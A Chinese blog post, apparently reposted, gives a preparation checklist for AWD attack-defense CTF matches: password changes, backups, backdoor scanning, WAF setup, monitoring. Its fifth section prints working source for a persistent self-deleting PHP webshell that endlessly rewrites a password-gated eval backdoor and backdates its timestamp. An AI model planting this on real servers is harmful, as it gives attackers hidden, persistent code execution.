当前位置:   article > 正文

AWD比赛的前期准备_awd靶场队伍ssh密码是多少

awd靶场队伍ssh密码是多少
1.改密码

之前参加强网杯,主办方给每个选手靶机ssh密码是一串md5密码,大家以为是随机密码,导致很多选手没改密码,结果大家都是相同的md5密码。

  • 修改ssh密码,即账号密码

sudo passwd user//修改账号密码sudoservice sshd restart //重启ssh服务,让密码即刻生效

  • 修改数据库密码

mysql 密码修改mysql> SET PASSWORD FOR 'user'@'localhost' = PASSWORD('newpass');

  • 修改web应用/网站管理员密码
    先到数据库看下密码,到时也能尝试默认密码登录对手的应用,修改数据库密码,或者
2.备份
  • 备份源码

tar -zcvf www.tar.gz/var/www/ 备份压缩源码tar -zcf /tmp/www.tar.gz/var/www/ 备份压缩到tmp目录去解压tar -zxvf www.tar.gz

  • 备份数据库

3.删除后门,修补漏洞

用d盾扫描源码,看看有没有隐藏的后门shell

用代码审计工具如Seay源代码审计系统 对代码进行审计看有无明显的漏洞

4.上waf,加固

waf可以安全狗,安全狗有两个版本,一个网站安全狗,可以对网站进行防护,cc攻击,sql注入,木马上传等,另一个是服务器安全狗,可以防止被提权,加固系统等

此处为语雀内容卡片,点击链接查看:Llinux网站安全狗安装方法 · 语雀

require_once('waf.php') 在公共配置文件添加,达到整站防注

安全狗安装

此处为语雀内容卡片,点击链接查看:Llinux网站安全狗安装方法 · 语雀

5.准备不死马,提权脚本

不死马

<?phpignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while(1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
}
?>

6.tips

1.防火墙

2.主机发现,

3.流量,文件监控

4.日志分析

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/405123
推荐阅读
相关标签
  

闽ICP备14008679号